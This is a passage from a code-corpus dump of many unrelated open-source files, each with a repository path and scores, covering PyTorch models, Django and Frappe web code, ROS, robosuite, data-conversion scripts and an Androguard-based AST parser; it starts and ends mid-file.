n_hidden = self.nASTNN(inputs)
n_shared_hidden = self.sharedASTNN(inputs)
output = self.n2label(torch.cat([n_hidden, n_shared_hidden], dim=1))
elif switch == 't':
t_shared_hidden = self.sharedASTNN(inputs)
output = self.shared2label(t_shared_hidden)
else:
raise ValueError('switch must be one of (m, n, t)')
return output
def forward_predict_tsne(self, inputs, switch='m'):
if switch == 'm':
hidden = self.mASTNN(inputs)
shared_hidden = self.sharedASTNN(inputs)
output = self.m2label(torch.cat([hidden, shared_hidden], dim=1))
else:
hidden = self.nASTNN(inputs)
shared_hidden = self.sharedASTNN(inputs)
output = self.n2label(torch.cat([hidden, shared_hidden], dim=1))
return output, hidden, shared_hidden
class GradientReversal(nn.Module):
"""
Gradient Reversal Layer
Forward pass is the identity function. In the backward pass,
the upstream gradients are multiplied by -lambda (i.e. gradient is reversed)
Ref: <NAME> al., Domain-adversarial training of neural networks (2016)
Link: https://jmlr.csail.mit.edu/papers/volume17/15-239/15-239.pdf
"""
def __init__(self, lambda_):
super(GradientReversal, self).__init__()
self.lambda_ = lambda_
def forward(self, x):
return x
def backward(self, x):
return -self.lambd * x
class Classifier(nn.Module):
"""
Classification Layer
"""
def __init__(self, hidden_dim, output_dim, cat_hidden=False, bidirection=True):
super(Classifier, self).__init__()
if bidirection:
hidden_dim = 2 * hidden_dim
if cat_hidden:
hidden_dim = 2 * hidden_dim
self.fc = nn.Linear(hidden_dim, output_dim)
def forward(self, x):
out = torch.sigmoid(self.fc(x))
# tmp=self.fc2(tmp)
# tmp=self.fc3(tmp)
# tmp = F.log_softmax(tmp)
return out
class TemporalCrossLing(nn.Module):
"""
Temporal CrossLing Model
"""
def __init__(self, args):
super(TemporalCrossLing, self).__init__()
self.astnn = ASTNN(args)
self.Gastnn = ASTNN(args)
self.gpu = args['use_gpu']
self.input_size = args['hidden_dim'] * 4
self.pad_size = args['hidden_dim'] * 2
self.batch_size = args['batch_size']
self.label_size = args['label_size']
self.time = args['time']
self.hidden_size = 64
self.num_layers = 1
if self.time:
self.lstm = TLSTM(self.input_size, self.batch_size, self.hidden_size, self.label_size)
else:
self.lstm = nn.LSTM(self.input_size, self.hidden_size, num_layers=1, batch_first=True)
self.fc = nn.Linear(self.hidden_size, self.label_size)
def pad_zeros(self, num):
zeros = Variable(torch.zeros(num, self.pad_size))
if self.gpu:
return zeros.cuda()
return zeros
def init_hidden(self):
if self.gpu is True:
h0 = Variable(torch.zeros(self.num_layers, self.batch_size, self.hidden_size).cuda())
c0 = Variable(torch.zeros(self.num_layers, self.batch_size, self.hidden_size).cuda())
else:
h0 = torch.zeros(self.num_layers, self.batch_size, self.hidden_size)
c0 = torch.zeros(self.num_layers, self.batch_size, self.hidden_size)
return h0, c0
def forward(self, x):
if self.time:
# using TLSTM
feature, time = x
x = feature
else:
time = None
lens = [len(item) for item in x]
max_len = max(lens)
self.batch_size = len(x)
batch_ast = []
Gbatch_ast = []
batch_t = []
for i in range(self.batch_size): # each student automatically form a batch for astnn
pad_len = max(max_len - lens[i], 0)
if pad_len > 0:
cur_pad = self.pad_zeros(pad_len)
batch_ast.append(cur_pad)
Gbatch_ast.append(cur_pad)
batch_t.append(Variable(torch.zeros(pad_len)))
cur_encode = self.astnn(x[i])
batch_ast.append(cur_encode)
cur_Gencode = self.Gastnn(x[i])
Gbatch_ast.append(cur_Gencode)
if self.time:
batch_t.append(torch.FloatTensor(time[i]))
encodes = torch.cat(batch_ast)
encodes = encodes.view(self.batch_size, max_len, -1)
Gencodes = torch.cat(Gbatch_ast)
Gencodes = Gencodes.view(self.batch_size, max_len, -1)
if self.time:
encodes_t = torch.cat(batch_t)
time = encodes_t.view(self.batch_size, max_len, -1) # (b, max_len, 1)
all_encodes = torch.cat([encodes, Gencodes], dim=2)
if self.gpu:
all_encodes = Variable(all_encodes).cuda()
time = time.cuda()
if self.time:
out, _ = self.lstm((all_encodes, time))
else:
# Set initial hidden and cell states
h0, c0 = self.init_hidden()
# Forward propagate LSTM
out, _ = self.lstm(all_encodes, (h0, c0)) # out: tensor of shape (batch_size, seq_length, hidden_size)
# Decode the hidden state of the last time step
out = self.fc(out[:, -1, :])
return torch.sigmoid(out)
| 2.828125 | 3 |
top/api/rest/WdtStatSalesBySpecShopWarehouseQueryRequest.py | SAMZONG/taobao-sdk-python3 | 0 | 12786489 | '''
Created by auto_sdk on 2020.09.01
'''
from top.api.base import RestApi
class WdtStatSalesBySpecShopWarehouseQueryRequest(RestApi):
def __init__(self,domain='gw.api.taobao.com',port=80):
RestApi.__init__(self,domain, port)
self.consign_date = None
self.sid = None
def getapiname(self):
return 'hu3cgwt0tc.wdt.stat.sales.by.spec.shop.warehouse.query'
| 1.65625 | 2 |
Notes/Sprint3/GraphBFT.py | mark-morelos/CS_Notes | 1 | 12786490 | # pseudocode
# Breadth-First Search
"""
procedure BFS(G, root) is
let Q be a queue
label root as discovered
Q.enqueue(root)
while Q is not empty do
v := Q.dequeue()
if v is the goal then
return v
for all edges from v to w in G.adjacentEdges(v) do
if w is not labeled as discovered then
label w as discovered
w.parent := v
Q.enqueue(w)
"""
from collections import deque
adjList = {
1: {2, 3},
2: {4},
3: {4},
4: {1}
}
def bfs(graph, startingNode, destinationNode):
queue = deque()
visited = set()
visited.add(startingNode)
queue.append(startingNode)
while len(queue) > 0:
currNode = queue.popleft()
print(f"visiting node {currNode}")
if currNode == destinationNode:
print(f"found dthe destination node {currNode}")
return currNode
for neighbor in graph[currNode]:
if neighbor not in visited:
visited.add(neighbor)
queue.append(neighbor)
bfs(adjList, 1, 4) | 3.96875 | 4 |
info/examples/format_conversion/convert_pdb.py | stxinsite/geomm | 3 | 12786491 | <reponame>stxinsite/geomm<gh_stars>1-10
# make sure to install dependencies in 'conversion.requirements.txt'
import os
import os.path as osp
import shutil
import sqlite3
import numpy as np
import pandas as pd
import tables as pytables
import mdtraj as mdj
from wepy.util.mdtraj import mdtraj_to_json_topology
from wepy.util.json_top import json_top_chain_df, json_top_residue_df, json_top_atom_df
traj = mdj.load('../lysozyme_pxylene.pdb')
if osp.exists("outputs"):
shutil.rmtree("outputs")
os.makedirs("outputs")
# the JSON format
json_top = mdtraj_to_json_topology(traj.top)
with open('outputs/lysozyme_pxylene.top.json', 'w') as wf:
wf.write(json_top)
# FASTA residue sequence
fasta_str = traj.top.to_fasta(chain=0)
with open('outputs/lysozyme_pxylene.res.fasta', 'w') as wf:
wf.write(fasta_str)
## topology tables
# Bonds
# you can get a table using mdtraj, but we just use the bonds here
mdj_atoms_df, bonds = traj.top.to_dataframe()
# just the first two columns (atom indices) for our purposes
bonds = bonds[:,0:2]
# we can just write this multiple ways with numpy
np.savetxt('outputs/lysozyme_pxylene.bonds.npy_txt', bonds)
np.save('outputs/lysozyme_pxylene.bonds.npy', bonds)
# make a pandas data frame
bond_df = pd.DataFrame(bonds)
# but wepy provides the ability to get normalized versions for each
# level
chain_df = json_top_chain_df(json_top)
residue_df = json_top_residue_df(json_top)
atom_df = json_top_atom_df(json_top)
bond_df.to_csv('outputs/lysozyme_pxylene.bond.csv', index=False)
chain_df.to_csv('outputs/lysozyme_pxylene.chain.csv', index=False)
residue_df.to_csv('outputs/lysozyme_pxylene.residue.csv', index=False)
atom_df.to_csv('outputs/lysozyme_pxylene.atom.csv', index=False)
# to an SQLite3 database
db = sqlite3.Connection("outputs/lysozyme_pxylene.sqlite3")
bond_df.to_sql('bonds', db)
chain_df.to_sql('chains', db)
residue_df.to_sql('residues', db)
atom_df.to_sql('atoms', db)
# to an HDF5 file
bond_df.to_hdf('outputs/lysozyme_pxylene.top.h5', 'bonds')
chain_df.to_hdf('outputs/lysozyme_pxylene.top.h5', 'chains')
residue_df.to_hdf('outputs/lysozyme_pxylene.top.h5', 'residues')
atom_df.to_hdf('outputs/lysozyme_pxylene.top.h5', 'atoms')
# to an excel spreadsheet
with pd.ExcelWriter('outputs/lysozyme_pxylene.top.xlsx', mode='r+') as writer:
bond_df.to_excel(writer, sheet_name='bonds')
chain_df.to_excel(writer, sheet_name='chains')
residue_df.to_excel(writer, sheet_name='residues')
atom_df.to_excel(writer, sheet_name='atoms')
## coordinates
# separately, in binary format
coords = traj.xyz
np.savez('outputs/lysozyme_pxylene_reference.npz', coords)
| 2.3125 | 2 |
RCNN_modified.py | CassieXueq/GitTest | 0 | 12786492 | <reponame>CassieXueq/GitTest
import torchvision
from torchvision.models.detection.faster_rcnn import FastRCNNPredictor
from torchvision.models.detection import FasterRCNN
from torchvision.models.detection.rpn import AnchorGenerator
'''
---------------------------------------------------------------------
Let’s suppose that you want to start from a model pre-trained on COCO and want to
finetune it for your particular classes. Here is a possible way of doing it:
--------------------------------------------------------------------------------
'''
# load a model pre-trained pre-trained on COCO
model = torchvision.models.detection.fasterrcnn_resnet50_fpn(pretrained=True)
# replace the classifier with a new one, that has
# num_classes which is user-defined
num_classes = 2 # 1 class (person) + background
# get number of input features for the classifier
in_features = model.roi_heads.box_predictor.cls_score.in_features
# replace the pre-trained head with a new one
model.roi_heads.box_predictor = FastRCNNPredictor(in_features, num_classes)
'''
---------------------------------------------------------------------
Modifying the model to add a different backbone
-----------------------------------------------------------------------
'''
# load a pre-trained model for classification and return
# only the features
backbone = torchvision.models.mobilenet_v2(pretrained=True).features
# FasterRCNN needs to know the number of
# output channels in a backbone. For mobilenet_v2, it's 1280
# so we need to add it here
backbone.out_channels = 1280
# let's make the RPN generate 5 x 3 anchors per spatial
# location, with 5 different sizes and 3 different aspect
# ratios. We have a Tuple[Tuple[int]] because each feature
# map could potentially have different sizes and
# aspect ratios
anchor_generator = AnchorGenerator(sizes=((32, 64, 128, 256, 512),),
aspect_ratios=((0.5, 1.0, 2.0),))
# let's define what are the feature maps that we will
# use to perform the region of interest cropping, as well as
# the size of the crop after rescaling.
# if your backbone returns a Tensor, featmap_names is expected to
# be [0]. More generally, the backbone should return an
# OrderedDict[Tensor], and in featmap_names you can choose which
# feature maps to use.
roi_pooler = torchvision.ops.MultiScaleRoIAlign(featmap_names=[0],
output_size=7,
sampling_ratio=2)
# put the pieces together inside a FasterRCNN model
model = FasterRCNN(backbone,
num_classes=2,
rpn_anchor_generator=anchor_generator,
box_roi_pool=roi_pooler) | 2.296875 | 2 |
asl-api/asl-api/urls.py | ooawagaeri/orbital-asl-application | 2 | 12786493 | <gh_stars>1-10
"""
urls.py
URL Mapping between HTTP and Views
"""
from django.contrib import admin
from django.urls import path, include
from django.conf import settings
from django.conf.urls import url
from django.views.static import serve
from django.conf.urls.static import static
urlpatterns = [
# Serve Admin dashboard
path('admin/', admin.site.urls),
# Serve API
path('api/', include('engine.urls')),
# Serve media images
url(r'^media/(?P<path>.*)$', serve, {'document_root': settings.MEDIA_ROOT, })
]
# Read media folder images
urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
| 2.203125 | 2 |
python/testData/intentions/PyConvertCollectionLiteralIntentionTest/convertTupleToSetNotAvailableInAssignmentTarget.py | jnthn/intellij-community | 2 | 12786494 | x, <caret>y = 1, 2 | 1.234375 | 1 |
tests/test_utils.py | cnzeki/tensorboardX | 0 | 12786495 | <filename>tests/test_utils.py<gh_stars>0
from tensorboardX import summary
import numpy as np
import pytest
import unittest
from tensorboardX.utils import make_grid, _prepare_video
class UtilsTest(unittest.TestCase):
def test_to_HWC(self):
np.random.seed(1)
test_image = np.random.randint(0, 256, size=(3, 32, 32), dtype=np.uint8)
converted = convert_to_HWC(test_image, 'chw')
assert converted.shape == (32, 32, 3)
test_image = np.random.randint(0, 256, size=(16, 3, 32, 32), dtype=np.uint8)
converted = convert_to_HWC(test_image, 'nchw')
assert converted.shape == (64, 256, 3)
test_image = np.random.randint(0, 256, size=(32, 32), dtype=np.uint8)
converted = convert_to_HWC(test_image, 'hw')
assert converted.shape == (32, 32, 3)
def test_prepare_video(self):
# at each timestep the sum over all other dimensions of the video should stay the same
np.random.seed(1)
V_before = np.random.random((4, 10, 3, 20, 20))
V_after = _prepare_video(np.copy(V_before))
V_before = np.swapaxes(V_before, 0, 1)
V_before = np.reshape(V_before, newshape=(10,-1))
V_after = np.reshape(V_after, newshape=(10,-1))
np.testing.assert_array_almost_equal(np.sum(V_before, axis=1), np.sum(V_after, axis=1))
def convert_to_HWC(tensor, input_format): # tensor: numpy array
assert(len(set(input_format)) == len(input_format)), "You can not use the same dimension shordhand twice."
assert(len(tensor.shape) == len(input_format)), "size of input tensor and input format are different"
input_format = input_format.upper()
if len(input_format) == 4:
index = [input_format.find(c) for c in 'NCHW']
tensor_NCHW = tensor.transpose(index)
tensor_CHW = make_grid(tensor_NCHW)
return tensor_CHW.transpose(1, 2, 0)
if len(input_format) == 3:
index = [input_format.find(c) for c in 'HWC']
return tensor.transpose(index)
if len(input_format) == 2:
index = [input_format.find(c) for c in 'HW']
tensor = tensor.transpose(index)
tensor = np.stack([tensor, tensor, tensor], 2)
return tensor
| 2.390625 | 2 |
src/nod.py | kirmani/hlpr_cadence | 0 | 12786496 | <filename>src/nod.py
import actionlib
import rospy
from std_msgs.msg import Header
from geometry_msgs.msg import TransformStamped, Transform, Vector3, Quaternion
from hlpr_lookat.msg import LookatWaypointsAction, LookatWaypointsGoal, LookatWaypointsResult
from action import Action
import subprocess
import time
def transform_helper(vec3, frame):
pos = TransformStamped()
pos.child_frame_id = frame
pos.header = Header()
pos.transform = Transform()
pos.transform.translation = vec3
return pos
class Nod(Action):
def __init__(self):
Action.__init__(self, 'look_center', [],
{},
{})
def Task(self):
rospy.init_node('scan_scene')
# Connect to the action client
scan_client = actionlib.SimpleActionClient('lookat_waypoints_action_server', LookatWaypointsAction)
rospy.logwarn("Waiting for scan scene server to load")
scan_client.wait_for_server()
rospy.logwarn("Scan scene loaded")
#Generate some positions
center = transform_helper(Vector3(1.0,0.0,0.2), 'pan_base_link')
down = transform_helper(Vector3(1.0,0.0,-2.0), 'pan_base_link')
# Generate some times
pause_2 = rospy.Duration(2.0)
# Store them away to send off
positions = [down, center]
scan_times = [pause_2, pause_2]
# Send the goals
goal = LookatWaypointsGoal()
goal.scan_positions = positions
goal.scan_times = scan_times
scan_client.send_goal(goal)
# Print results
rospy.loginfo("Waiting for scan to finish")
scan_client.wait_for_result()
rospy.loginfo(scan_client.get_goal_status_text())
print("Looked center: %s")
| 2.328125 | 2 |
cartrade/templates/pages/details_variants.py | vignesharumainayagam/csdwale-cartrade-live | 0 | 12786497 | # -*- coding: utf-8 -*-
# Copyright (c) 2018, Tridots Tech Pvt. Ltd. and contributors
# For license information, please see license.txt
from __future__ import unicode_literals
# import frappe
# from _future_ import unicode_literals
import frappe
import frappe.utils
import json
from frappe import _
def get_context(context):
location = frappe.request.cookies.get('city_location')
path = frappe.local.request.path
path = path.replace('csd-', '')
path = path.replace('-price', '')
context.path = path
path = path.strip('/')
word = path.split('/')
category_route = word[0]
brand_route = word[1]
item_route = word[2]
variant_route = word[3]
addrightadd = frappe.db.get_value('Widget Placeholder', fieldname=['google_ad_script'], filters={"view": 'Variant Detail Page', 'position': 'Right Panel'})
context.addrightadd = addrightadd
context.addtopadd = frappe.db.get_value('Widget Placeholder', fieldname=['google_ad_script'], filters={'view': 'Variant Detail Page', 'position': 'Top Panel'})
context.addbottomadd = frappe.db.get_value('Widget Placeholder', fieldname=['google_ad_script'], filters={'view': 'Variant Detail Page', 'position': 'Bottom Panel'})
context.addmidads = frappe.db.get_value('Widget Placeholder', fieldname=['google_ad_script'], filters={'view': 'Variant Detail Page', 'position': 'Middle Panel'})
item_name = frappe.db.get_value("Item",
filters={'route': item_route}, fieldname=['name'])
context.item_brand = frappe.db.get_value("ItemBrand",
filters={'route': brand_route}, fieldname=['brand_name'])
context.item_title = frappe.db.get_value("Item",
filters={'route': item_route}, fieldname=['item_name'])
context.category_title = frappe.db.get_value("Category",
filters={'route': category_route}, fieldname=['category_name'])
context.item_brand_route = brand_route
context.item_category_route = category_route
context.item_route = item_route
context.variant_route = variant_route
context.variant_title = frappe.db.get_value("Item Variant",
filters={'route': variant_route, 'item': item_name}, fieldname=['variant_name'])
context.meta_title = frappe.db.get_value("Item Variant",
filters={'route': variant_route, 'item': item_name}, fieldname=['meta_title'])
context.meta_description = frappe.db.get_value("Item Variant",
filters={'route': variant_route, 'item': item_name}, fieldname=['meta_description'])
context.meta_keywords = frappe.db.get_value("Item Variant",
filters={'route': variant_route, 'item': item_name}, fieldname=['meta_keywords'])
context.item_featured_image = frappe.db.get_value("Item",
filters={'route': item_route}, fieldname=['featured_image'])
item_variant_doc_name = frappe.db.get_value("Item Variant",
filters={'route': variant_route}, fieldname=['name'])
context.item_variant_doc_name =item_variant_doc_name
item_variants = frappe.db.get_all("Item Variant",
fields=['route','variant_name', 'name'],
filters={'item': item_name},
limit_page_length= 100)
for x in item_variants:
if frappe.request.cookies.get('city_location'):
price = frappe.db.get_list('Item Variant Price',
fields = ['market_price', 'csd_price'],
filters = {'variant': x.name, 'city': frappe.request.cookies.get('city_location'), 'item': item_name})
if len(price) > 0:
x.csd_price = price[0].csd_price
x.market_price = price[0].market_price
else:
x.csd_price = "Na"
x.market_price = "Na"
else:
price = frappe.db.get_list('Item Variant Price',
fields = ['market_price', 'csd_price'],
filters = {'variant': x.name, 'city': 'Delhi', 'item': item_name})
if len(price) > 0:
x.csd_price = price[0].csd_price
x.market_price = price[0].market_price
else:
x.csd_price = "Na"
x.market_price = "Na"
context.item_variants = item_variants
variant_specifications = frappe.db.get_list('Item Specification',
fields=['specification', 'value'],
filters={'parent': item_variant_doc_name})
for x in variant_specifications:
x.specification_group = frappe.db.get_value("Specification",
filters={'name': x.specification}, fieldname=['specification_category'])
context.variant_specifications = variant_specifications
if frappe.request.cookies.get('city_location'):
price = frappe.db.get_list('Item Variant Price',
fields = ['market_price', 'csd_price'],
filters = {'variant': item_variant_doc_name, 'city': frappe.request.cookies.get('city_location'), 'item': item_name})
if len(price) > 0:
context.csd_price = price[0].csd_price
context.market_price = price[0].market_price
else:
context.csd_price = "Na"
context.market_price = "Na"
else:
price = frappe.db.get_list('Item Variant Price',
fields = ['market_price', 'csd_price'], filters = {'variant': item_variant_doc_name, 'city': 'Delhi', 'item': item_name})
if len(price) > 0:
context.csd_price = price[0].csd_price
context.market_price = price[0].market_price
context.difference=price[0].difference
else:
context.csd_price = "Na"
context.market_price = "Na" | 1.695313 | 2 |
src/common/pytorch/layer/normalize_linear_layer.py | wu-uw/OpenCompetition | 15 | 12786498 | import torch
import torch.nn as nn
from torch.nn import Parameter
from torch.autograd import Variable
class NormedLinearLayer(nn.Module):
def __init__(self, input_dim, out_dim, momentum=0.1):
super(NormedLinearLayer, self).__init__()
self.input_dim = input_dim
self.out_dim = out_dim
self.momentum = momentum
self._build_model()
def _build_model(self):
self.linear = nn.utils.weight_norm(nn.Linear(self.input_dim, self.out_dim))
self.bias = Parameter(torch.Tensor)
self.register_buffer('running_mean', torch.zeros(self.out_dim))
self.reset_parameter()
def reset_parameter(self):
self.running_mean.zero_()
self.bias.data.zero_()
def forward(self, inputs):
inputs = self.linear(inputs)
if self.training:
avg = torch.mean(inputs, dim=0)
self.running_mean = (1 - self.momentum) * self.running_mean + self.momentum * avg.data
else:
avg = Variable(self.running_mean, requires_grad=False)
out = inputs - avg + self.bias
return out
| 2.671875 | 3 |
product.py | mbehrle/trytond-sale-available-stock | 0 | 12786499 | <filename>product.py
# -*- coding: utf-8 -*-
"""
product.py
"""
from trytond.pyson import PYSONEncoder, PYSONDecoder
from trytond.modules.stock import ProductByLocation
__all__ = ['ProductByLocationExcludeAssigned']
class ProductByLocationExcludeAssigned(ProductByLocation):
"""
Show Product by Locations excluding assigned quantities
"""
__name__ = 'product.by_location.exclude_assigned'
def do_open(self, action):
action, data = super(
ProductByLocationExcludeAssigned, self
).do_open(action)
# Decode pyson context
context = PYSONDecoder().decode(action['pyson_context'])
# Update context
context['stock_assign'] = True
# Encode the new context to create new pyson context
action['pyson_context'] = PYSONEncoder().encode(context)
return action, data
| 2.515625 | 3 |
phr/catalogo/api/serializers.py | richardqa/django-ex | 0 | 12786500 | <reponame>richardqa/django-ex
# coding=utf-8
from rest_framework import serializers
from phr.catalogo.models import (
CatalogoAyudaTecnica, CatalogoCIE, CatalogoDeficiencia, CatalogoDiscapacidad, CatalogoEtnia, CatalogoFinanciador,
CatalogoGradoInstruccion, CatalogoProcedimiento, CatalogoRaza, FamiliaMedicamentoAntecedenteSugerido,
MedicamentoAntecedenteSugerido,
)
class ListaCatalogoCIESerializer(serializers.ModelSerializer):
class Meta:
model = CatalogoCIE
exclude = []
class DetalleCatalogoCIESerializer(serializers.ModelSerializer):
class Meta:
model = CatalogoCIE
exclude = []
class ListaCatalogoProcedimientoSerializer(serializers.ModelSerializer):
class Meta:
model = CatalogoProcedimiento
exclude = []
class DetalleCatalogoProcedimientoSerializer(serializers.ModelSerializer):
class Meta:
model = CatalogoProcedimiento
exclude = []
class ListaCatalogoDeficienciaSerializer(serializers.ModelSerializer):
class Meta:
model = CatalogoDeficiencia
exclude = []
class DetalleCatalogoDeficienciaSerializer(serializers.ModelSerializer):
class Meta:
model = CatalogoDeficiencia
fields = ['id', 'categoria_deficiencia', 'nombre_deficiencia', 'get_deficiencia_subnivel']
class ListaCatalogoDiscapacidadSerializer(serializers.ModelSerializer):
class Meta:
model = CatalogoDiscapacidad
exclude = []
class DetalleCatalogoDiscapacidadSerializer(serializers.ModelSerializer):
class Meta:
model = CatalogoDiscapacidad
exclude = []
class ListaCatalogoRazaSerializer(serializers.ModelSerializer):
class Meta:
model = CatalogoRaza
exclude = []
class DetalleCatalogoRazaSerializer(serializers.ModelSerializer):
class Meta:
model = CatalogoRaza
fields = ['descripcion', 'get_etnias']
exclude = []
class ListaCatalogoEtniaSerializer(serializers.ModelSerializer):
class Meta:
model = CatalogoEtnia
exclude = []
class DetalleCatalogoEtniaSerializer(serializers.ModelSerializer):
class Meta:
model = CatalogoEtnia
exclude = []
class ListaCatalogoFinanciadorSerializer(serializers.ModelSerializer):
class Meta:
model = CatalogoFinanciador
exclude = []
class DetalleCatalogoFinanciadorSerializer(serializers.ModelSerializer):
class Meta:
model = CatalogoFinanciador
exclude = []
class ListaCatalogoAyudaTecnicaSerializer(serializers.ModelSerializer):
class Meta:
model = CatalogoAyudaTecnica
exclude = []
class DetalleCatalogoAyudaTecnicaSerializer(serializers.ModelSerializer):
class Meta:
model = CatalogoAyudaTecnica
exclude = []
class ListaCatalogoGradoInstruccionSerializer(serializers.ModelSerializer):
class Meta:
model = CatalogoGradoInstruccion
exclude = []
class DetalleCatalogoGradoInstruccionSerializer(serializers.ModelSerializer):
class Meta:
model = CatalogoAyudaTecnica
exclude = []
class MedicamentoFamiliaAntecedenteSugeridoSerializer(serializers.ModelSerializer):
class Meta:
model = FamiliaMedicamentoAntecedenteSugerido
fields = ('codigo', 'nombre',)
class MedicamentoAntecedenteSugeridoSerializer(serializers.ModelSerializer):
class Meta:
model = MedicamentoAntecedenteSugerido
fields = ('codigo', 'nombre',)
| 2.078125 | 2 |
1131.py | luizgallas/uri_iniciante | 0 | 12786501 | <reponame>luizgallas/uri_iniciante
fim = 1
vgremio = 0
vinter = 0
empate = 0
final = 0
soma = 0
while (fim == 1):
inter, gremio = map(int, input().split())
soma += 1
if inter > gremio:
vinter = vinter + 1
elif gremio > inter:
vgremio = vgremio + 1
elif inter == gremio:
empate += 1
print("Novo grenal (1-sim 2-nao)")
fim = int(input())
print(soma,"grenais")
print("Inter:%d" %(vinter))
print("Gremio:%d" %(vgremio))
print("Empates:%d" %(empate))
if vinter > vgremio:
print("Inter venceu mais")
elif vgremio > vinter:
print("Gremio venceu mais")
else:
print("Nao houve vencedor")
| 3.4375 | 3 |
examples/offline/bc_robo_utils.py | mohanksriram/robolfd | 0 | 12786502 | from dataclasses import dataclass
import h5pickle as h5py
import json
import numpy as np
from numpy import ndarray
from pathlib import Path
from typing import List
import random
from robolfd.types import Transition
import robosuite
from robosuite.utils.mjcf_utils import postprocess_model_xml
import itertools
from tqdm import tqdm
from multiprocessing import Pool
@dataclass
class DemoConfig:
obs_keys: dict
max_episodes: int
num_workers: int
def __str__(self) -> str:
return f"demo config - observation keys: {self.obs_keys} max_episodes: {self.max_episodes}, num_workers: {self.num_workers}"
def generate_episode_transitions(demo_info):
f, episode_num, config = demo_info
episodes = list(f["data"].keys())
episode = episodes[episode_num]
env_info = json.loads(f["data"].attrs["env_info"])
env = robosuite.make(
**env_info,
has_renderer=False,
has_offscreen_renderer=False,
ignore_done=True,
use_camera_obs=False,
reward_shaping=True,
control_freq=20,
)
model_xml = f[f"data/{episode}"].attrs["model_file"]
env.reset()
xml = postprocess_model_xml(model_xml)
env.reset_from_xml_string(xml)
env.sim.reset()
all_observations = []
all_actions = []
# TODO: start from state
states = f[f"data/{episode}/states"][()]
actions = np.array(f[f"data/{episode}/actions"][()])
# load the initial state
env.sim.set_state_from_flattened(states[0])
env.sim.forward()
observations = []
action = [0, 0, 0, -1]
observation, _, _, _ = env.step(action)
# observe the current state
observations.append(observation)
used_actions = []
# Fix the order of action, observation sampling problem here
for j, action in enumerate(actions):
action = np.clip(action, -1, 1)
observation, reward, done, misc = env.step(action)
# use when you want to evaluate the environment
# env.render()
used_actions.append(action)
observations.append(observation)
# repeat last action for last observation
used_actions.append(actions[-1])
flat_observations = []
for observation in observations:
flat_observations.append(np.concatenate([observation[key] for key in config.obs_keys]))
# z
all_observations.extend(flat_observations)
all_actions.extend(used_actions)
return list(zip(all_observations, all_actions))
def make_demonstrations(demo_path: Path, config: DemoConfig) -> ndarray:
f = h5py.File(demo_path, "r", skip_cache=False)
episodes = list(f["data"].keys())[-config.max_episodes:]
# TODO: Decide how to batch transitions across episodes
# Dataset is collected in the form of transitions.
pbar = tqdm(total=len(episodes))
with Pool(config.num_workers) as pool:
# simple pool usage
# transitions = pool.map(generate_episode_transitions, [(demo_path, i, config) for i in range(len(episodes))])
# for measuring progress:
res = [pool.apply_async(generate_episode_transitions, args=((f, i, config),),
callback=lambda _: pbar.update(1)) for i in range(len(episodes))]
transitions = [p.get() for p in res]
pool.close()
pool.join()
return transitions
def make_eval_env(demo_path: Path, robot_name="Panda", has_offscreen_renderer = True):
f = h5py.File(demo_path, "r")
env_name = f["data"].attrs["env"]
env_info = json.loads(f["data"].attrs["env_info"])
env_info['robots'] = robot_name
env = robosuite.make(
**env_info,
has_renderer=not has_offscreen_renderer,
has_offscreen_renderer=has_offscreen_renderer,
ignore_done=True,
use_camera_obs=has_offscreen_renderer,
reward_shaping=True,
control_freq=20,
camera_names="frontview",
camera_heights=512,
camera_widths=512,
)
return env | 2.109375 | 2 |
test/mock_tests/test_markets.py | xelonic-de/iex-data | 2 | 12786503 | <reponame>xelonic-de/iex-data<gh_stars>1-10
from unittest import TestCase
from mock import patch, MagicMock
import iexdata.endpoints.markets as markets
class TestAll(TestCase):
def test_markets(self):
with patch('requests.get') as mock:
mock.return_value = MagicMock()
mock.return_value.status_code = 200
markets.market()
| 2.203125 | 2 |
scorecardpy/describe.py | cuichaosiig/scorecard_improved | 0 | 12786504 | <filename>scorecardpy/describe.py
import pandas as pd
import numpy as np
def unique_counts(df,cols):
'''
# 显示各个列的唯一值个数:
df: 需要进行处理的dataframe
cols: 需要处理的列
return:
描述信息
-------------------------------
Author: 崔超
'''
uniqC = pd.DataFrame()
uniqC = df.apply(lambda x: len(x.value_counts()) ,axis = 0)
return uniqC
| 3.03125 | 3 |
archive/KyleChesney/combine_repeat_ihar.py | ChemiKyle/USING-MACHINE-LEARNING-TO-IMPROVE-POST-ACUTE-REHABILITATION-PROCESS-FLOW | 0 | 12786505 | <filename>archive/KyleChesney/combine_repeat_ihar.py
# We noticed that what should be a unique visit identifier, IHAR, was repeating
# the cause was that patients transferred out or taking leave were listed as being discharged and readmitted
# but they were not assigned a new visit identifier.
# Our solution to clean this was to identify duplicate IHARs, and condense them into one visit
# by using only the earliest admission and latest discharge, all other columns for these entries were identical.
# Akshay solved this problem via other methods directly in Pandas,
# this code is left here for essentially sentimental reasons
from datetime import datetime as dt
df_qual = pd.read_csv('data/FinalData.csv')
repeat_ihars = df_qual[df_qual['IHAR'].duplicated()]['IHAR'].unique()
df_qual['date_delta'] = df_qual['HOSP_DISCH_TIME'] - df_qual['HOSP_ADMSN_TIME']
# IHAR: {min: xx, max: yy}
ihar_intermediary = {}
time_format = '%d-%b-%Y %H:%M:%S'
for index, row in df_qual.iterrows():
ihar = (row['IHAR'])
if (ihar in repeat_ihars):
this_adm = row['HOSP_ADMSN_TIME']
print(this_adm)
this_dsch = row['HOSP_DISCH_TIME']
if (ihar not in ihar_intermediary):
if (np.isnan(this_adm) | np.isnan(this_dsch)):
continue
else:
ihar_intermediary[ihar] = {'min_adm': this_adm, 'max_disch': this_dsch}
else:
if (np.isnan(this_adm) | np.isnan(this_dsch)):
continue
print(this_adm_time)
this_adm_dt = dt.strptime(this_adm, time_format)
this_dsch_dt = dt.strptime(this_dsch, time_format)
| 2.484375 | 2 |
ASTParser/parser_main.py | DploY707/AST_parser | 4 | 12786506 | from pprint import pprint
import json
import gzip
import pickle
import copy
from androguard.decompiler.dad.decompile import DvMethod
from androguard.misc import AnalyzeAPK
from core.parser import ASTParser
from core.parser import ConstData
from core.parser import stmtList
from core.parser import actionList
from core.parser import dataList
from core.statements import Statement
from core.graph import ASTGraph
from core.graph import GraphConfig
from core.utils import save_pickle, load_pickle
from core.utils import get_filteredFileList_from_directory as get_targets
import networkx as nx
targetPath = 'data/'
target = 'data/okhttp-3.1.0_dex.jar'
resultPath = '/root/result/'
targetExts = ['.apk', '.jar']
# config = GraphConfig(10000,20000)
def create_ast(method):
if method.is_external():
return
try:
dv = DvMethod(method)
dv.process(doAST=True)
return dv.get_ast()
except AttributeError as ae:
